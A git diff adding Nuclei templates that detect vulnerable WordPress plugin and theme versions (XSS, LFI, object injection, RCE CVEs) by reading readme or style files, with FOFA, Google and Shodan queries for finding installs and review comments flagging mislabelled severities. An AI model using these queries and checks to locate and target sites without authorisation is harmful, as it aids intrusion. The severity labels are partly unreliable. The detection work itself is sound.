+ The WP SMS – Ultimate SMS & MMS Notifications, 2FA, OTP, and Integrations with WooCommerce, GravityForms, and More plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 6.9.3. This makes it possible for unauthenticated attackers to perform an unauthorized action.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/08cb2162-fac3-47af-9292-116095ee40dc?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-43331
+ metadata:
+ fofa-query: "wp-content/plugins/wp-sms/"
+ google-query: inurl:"/wp-content/plugins/wp-sms/"
+ shodan-query: 'vuln:CVE-2024-43331'
+ tags: cve,wordpress,wp-plugin,wp-sms,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-sms/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-sms"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.9.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43335-d46b713e90a8332ac8b26c7a7126c9a0.yaml b/poc/cve/CVE-2024-43335-d46b713e90a8332ac8b26c7a7126c9a0.yaml
new file mode 100644
index 0000000000..65c3552573
--- /dev/null
+++ b/poc/cve/CVE-2024-43335-d46b713e90a8332ac8b26c7a7126c9a0.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43335-d46b713e90a8332ac8b26c7a7126c9a0
+
+info:
+ name: >
+ Responsive Blocks – WordPress Gutenberg Blocks <= 1.8.8 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Responsive Blocks – WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the taxonomy block in versions up to, and including, 1.8.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1c894de0-2ea7-4002-9c26-0e3e59744a5e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43335
+ metadata:
+ fofa-query: "wp-content/plugins/responsive-block-editor-addons/"
+ google-query: inurl:"/wp-content/plugins/responsive-block-editor-addons/"
+ shodan-query: 'vuln:CVE-2024-43335'
+ tags: cve,wordpress,wp-plugin,responsive-block-editor-addons,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/responsive-block-editor-addons/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "responsive-block-editor-addons"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.8.8')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43342-3188eb24eebca6379b805dcc2fd53688.yaml b/poc/cve/CVE-2024-43342-3188eb24eebca6379b805dcc2fd53688.yaml
new file mode 100644
index 0000000000..a7499e58b6
--- /dev/null
+++ b/poc/cve/CVE-2024-43342-3188eb24eebca6379b805dcc2fd53688.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43342-3188eb24eebca6379b805dcc2fd53688
+
+info:
+ name: >
+ Ultimate Store Kit Elementor Addons <= 1.6.4 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Ultimate Store Kit Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/51a4886b-2e15-4d91-b853-4a675120a9e9?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43342
+ metadata:
+ fofa-query: "wp-content/plugins/ultimate-store-kit/"
+ google-query: inurl:"/wp-content/plugins/ultimate-store-kit/"
+ shodan-query: 'vuln:CVE-2024-43342'
+ tags: cve,wordpress,wp-plugin,ultimate-store-kit,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ultimate-store-kit/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ultimate-store-kit"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.6.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43344-dd2bfc771cca501ba1c20aa66e532070.yaml b/poc/cve/CVE-2024-43344-dd2bfc771cca501ba1c20aa66e532070.yaml
new file mode 100644
index 0000000000..d721e7a28a
--- /dev/null
+++ b/poc/cve/CVE-2024-43344-dd2bfc771cca501ba1c20aa66e532070.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43344-dd2bfc771cca501ba1c20aa66e532070
+
+info:
+ name: >
+ Icegram <= 3.1.25 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Icegram plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.1.25 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/230f40c1-a8a9-4932-a3f1-ecddc52acca9?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43344
+ metadata:
+ fofa-query: "wp-content/plugins/icegram/"
+ google-query: inurl:"/wp-content/plugins/icegram/"
+ shodan-query: 'vuln:CVE-2024-43344'
+ tags: cve,wordpress,wp-plugin,icegram,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/icegram/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "icegram"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.1.25')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43345-818187bf525840885c083c5886f89859.yaml b/poc/cve/CVE-2024-43345-818187bf525840885c083c5886f89859.yaml
new file mode 100644
index 0000000000..dd07e41c9f
--- /dev/null
+++ b/poc/cve/CVE-2024-43345-818187bf525840885c083c5886f89859.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43345-818187bf525840885c083c5886f89859
+
+info:
+ name: >
+ Landing Page Builder <= 1.5.2.0 - Authenticated (Editor+) Local File Inlcusion
+ author: topscoder
+ severity: low
+ description: >
+ The Landing Page Builder – Coming Soon page, Maintenance Mode, Lead Page, WordPress Landing Pages plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.5.2.0. This makes it possible for authenticated attackers, with Editor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/bacfa993-2fc1-43bc-b4f0-f463ba28b4ed?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.2
+ cve-id: CVE-2024-43345
+ metadata:
+ fofa-query: "wp-content/plugins/page-builder-add/"
+ google-query: inurl:"/wp-content/plugins/page-builder-add/"
+ shodan-query: 'vuln:CVE-2024-43345'
+ tags: cve,wordpress,wp-plugin,page-builder-add,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/page-builder-add/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "page-builder-add"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5.2.0')
\ No newline at end of file
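Review bot: `name` has a typo, `Local File Inlcusion`, and this is the string that ends up in scan output and that people grep for; it should read `Landing Page Builder <= 1.5.2.0 - Authenticated (Editor+) Local File Inclusion`. The `description`, `PR:H` vector and `page-builder-add` path are otherwise consistent with an Editor-level LFI, so only the title needs correcting here.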
diff --git a/poc/cve/CVE-2024-43346-461457ac208690c9e7435e5f9cf93bf1.yaml b/poc/cve/CVE-2024-43346-461457ac208690c9e7435e5f9cf93bf1.yaml
new file mode 100644
index 0000000000..7adb4431f7
--- /dev/null
+++ b/poc/cve/CVE-2024-43346-461457ac208690c9e7435e5f9cf93bf1.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43346-461457ac208690c9e7435e5f9cf93bf1
+
+info:
+ name: >
+ Modal Window <= 6.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Modal Window plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 6.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7790777d-9421-48c6-b789-f1feab109ec7?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43346
+ metadata:
+ fofa-query: "wp-content/plugins/modal-window/"
+ google-query: inurl:"/wp-content/plugins/modal-window/"
+ shodan-query: 'vuln:CVE-2024-43346'
+ tags: cve,wordpress,wp-plugin,modal-window,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/modal-window/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "modal-window"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.0.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43348-1d80aee807a5a09c59890436b5a4ba06.yaml b/poc/cve/CVE-2024-43348-1d80aee807a5a09c59890436b5a4ba06.yaml
new file mode 100644
index 0000000000..02dfd90866
--- /dev/null
+++ b/poc/cve/CVE-2024-43348-1d80aee807a5a09c59890436b5a4ba06.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43348-1d80aee807a5a09c59890436b5a4ba06
+
+info:
+ name: >
+ Purity Of Soul <= 1.9 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Purity Of Soul theme for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/53d2f416-4b0f-49b7-af14-fbb225aac34d?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-43348
+ metadata:
+ fofa-query: "wp-content/themes/purity-of-soul/"
+ google-query: inurl:"/wp-content/themes/purity-of-soul/"
+ shodan-query: 'vuln:CVE-2024-43348'
+ tags: cve,wordpress,wp-theme,purity-of-soul,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/purity-of-soul/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "purity-of-soul"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43350-7658ea1ea1a448ef16e7448bb1e7b7a3.yaml b/poc/cve/CVE-2024-43350-7658ea1ea1a448ef16e7448bb1e7b7a3.yaml
new file mode 100644
index 0000000000..58f0938e8a
--- /dev/null
+++ b/poc/cve/CVE-2024-43350-7658ea1ea1a448ef16e7448bb1e7b7a3.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43350-7658ea1ea1a448ef16e7448bb1e7b7a3
+
+info:
+ name: >
+ Propovoice CRM <= 1.7.6.4 - Unauthenticated Insecure Direct Object Reference
+ author: topscoder
+ severity: medium
+ description: >
+ The Propovoice: All-in-One Client Management System plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.7.6.4 due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to perform an unauthorized action.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/25acd3d9-0c1a-426e-b670-b842f031bdc5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-43350
+ metadata:
+ fofa-query: "wp-content/plugins/propovoice/"
+ google-query: inurl:"/wp-content/plugins/propovoice/"
+ shodan-query: 'vuln:CVE-2024-43350'
+ tags: cve,wordpress,wp-plugin,propovoice,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/propovoice/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "propovoice"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.7.6.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43352-1f777e494418c326b6a3b5ba5223adb4.yaml b/poc/cve/CVE-2024-43352-1f777e494418c326b6a3b5ba5223adb4.yaml new file mode 100644 index 0000000000..c90099f47f --- /dev/null +++ b/poc/cve/CVE-2024-43352-1f777e494418c326b6a3b5ba5223adb4.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43352-1f777e494418c326b6a3b5ba5223adb4 + +info: + name: > + GivingPress Lite <= 1.8.6 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The GivingPress Lite theme for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.8.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/69a14e2f-442e-421c-bf5d-0bff3b822911?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43352 + metadata: + fofa-query: "wp-content/themes/givingpress-lite/" + google-query: inurl:"/wp-content/themes/givingpress-lite/" + shodan-query: 'vuln:CVE-2024-43352' + tags: cve,wordpress,wp-theme,givingpress-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/givingpress-lite/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "givingpress-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.6') \ No newline at end of file 
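Review bot: `severity: low` and the trailing `low` in `tags` disagree with the template's own `cvss-score: 6.4` (CVSS v3.1 rates 4.0 to 6.9 as medium), so severity- or tag-filtered runs skip this finding. The same mismatch recurs in the templates at L121, L125, L127, L130 and L136 (6.4 labelled low), L129 (a 9.9 authenticated RCE labelled low), L131 and L135 (8.8 labelled low), L134 (7.5 labelled low), L133, L137 and L138 (4.3 labelled low), and in the other direction at L123, where 8.1 is labelled `critical` instead of high. Since these templates are generated from the Wordfence feed, the mapping step is presumably what is wrong; `severity` and the last tag should be derived from `cvss-score`, which here gives `severity: medium` and `tags: cve,wordpress,wp-theme,givingpress-lite,medium`.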
diff --git a/poc/cve/CVE-2024-43353-f420c4e69c0e2367aa76bcdf09d1f8d5.yaml b/poc/cve/CVE-2024-43353-f420c4e69c0e2367aa76bcdf09d1f8d5.yaml new file mode 100644 index 0000000000..d0fe243400 --- /dev/null +++ b/poc/cve/CVE-2024-43353-f420c4e69c0e2367aa76bcdf09d1f8d5.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43353-f420c4e69c0e2367aa76bcdf09d1f8d5 + +info: + name: > + myCred <= 2.7.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The myCred plugin for WordPress is vulnerable to Stored Cross-Site Scripting via wrapper attribute in versions up to, and including, 2.7.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/69695e2e-2086-4d50-8518-0b2f5ab9ea56?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43353 + metadata: + fofa-query: "wp-content/plugins/mycred/" + google-query: inurl:"/wp-content/plugins/mycred/" + shodan-query: 'vuln:CVE-2024-43353' + tags: cve,wordpress,wp-plugin,mycred,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mycred/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mycred" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.2') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-43354-adbfb0fd375f392abe494aebd005cbcb.yaml b/poc/cve/CVE-2024-43354-adbfb0fd375f392abe494aebd005cbcb.yaml new file mode 100644 index 0000000000..3c3e731a8d --- /dev/null +++ b/poc/cve/CVE-2024-43354-adbfb0fd375f392abe494aebd005cbcb.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43354-adbfb0fd375f392abe494aebd005cbcb + +info: + name: > + myCred <= 2.7.2 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + The myCred – Loyalty Points and Rewards plugin for WordPress and WooCommerce – Give Points, Ranks, Badges, Cashback, WooCommerce rewards, and WooCommerce credits for Gamification plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.7.2 via deserialization of untrusted input from the 'data' parameter This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/44ea3322-10f6-4f52-8fa8-8cc2632b67ce?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-43354 + metadata: + fofa-query: "wp-content/plugins/mycred/" + google-query: inurl:"/wp-content/plugins/mycred/" + shodan-query: 'vuln:CVE-2024-43354' + tags: cve,wordpress,wp-plugin,mycred,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mycred/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mycred" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.2') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-5502-46f49a6a29c567a0601ab29368ea1138.yaml b/poc/cve/CVE-2024-5502-46f49a6a29c567a0601ab29368ea1138.yaml new file mode 100644 index 0000000000..43348020dd --- /dev/null +++ b/poc/cve/CVE-2024-5502-46f49a6a29c567a0601ab29368ea1138.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-5502-46f49a6a29c567a0601ab29368ea1138 + +info: + name: > + Piotnet Addons For Elementor <= 2.4.30 - Authenticated (Contributor+) Stored Cross-Site Scripting via Multiple Widgets + author: topscoder + severity: low + description: > + The Piotnet Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Image Accordion, Dual Heading, and Vertical Timeline widgets in all versions up to, and including, 2.4.30 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/921616e4-2b66-4847-869a-90c1c459685f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-5502 + metadata: + fofa-query: "wp-content/plugins/piotnet-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/piotnet-addons-for-elementor/" + shodan-query: 'vuln:CVE-2024-5502' + tags: cve,wordpress,wp-plugin,piotnet-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/piotnet-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "piotnet-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.30') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-5583.yaml b/poc/cve/CVE-2024-5583.yaml new file mode 100644 index 0000000000..19e4d4f0ca --- /dev/null +++ b/poc/cve/CVE-2024-5583.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-5583 + +info: + name: > + The Plus Addons for Elementor – Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce <= 5.6.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Testimonials Widget Settings + author: topscoder + severity: low + description: > + The The Plus Addons for Elementor – Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the carousel_direction parameter of testimonials widget in all versions up to, and including, 5.6.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/55981e72-8d1a-4075-a372-6bddc95e99d8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-5583 + metadata: + fofa-query: "wp-content/plugins/the-plus-addons-for-elementor-page-builder/" + google-query: inurl:"/wp-content/plugins/the-plus-addons-for-elementor-page-builder/" + shodan-query: 'vuln:CVE-2024-5583' + tags: cve,wordpress,wp-plugin,the-plus-addons-for-elementor-page-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/the-plus-addons-for-elementor-page-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 
"the-plus-addons-for-elementor-page-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.6.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6386.yaml b/poc/cve/CVE-2024-6386.yaml new file mode 100644 index 0000000000..e3f74ebcea --- /dev/null +++ b/poc/cve/CVE-2024-6386.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-6386 + +info: + name: > + WPML Multilingual CMS <= 4.6.12 - Authenticated(Contributor+) Remote Code Execution via Twig Server-Side Template Injection + author: topscoder + severity: low + description: > + The WPML plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.6.12 via the Twig Server-Side Template Injection. This is due to missing input validation and sanitization on the render function. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f7fc91cc-e529-4362-8269-bf7ee0766e1e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.9 + cve-id: CVE-2024-6386 + metadata: + fofa-query: "wp-content/plugins/sitepress-multilingual-cms/" + google-query: inurl:"/wp-content/plugins/sitepress-multilingual-cms/" + shodan-query: 'vuln:CVE-2024-6386' + tags: cve,wordpress,wp-plugin,sitepress-multilingual-cms,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/sitepress-multilingual-cms/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sitepress-multilingual-cms" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.6.12') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6870.yaml b/poc/cve/CVE-2024-6870.yaml new file mode 100644 index 0000000000..5f5e2ffe58 --- /dev/null +++ b/poc/cve/CVE-2024-6870.yaml 
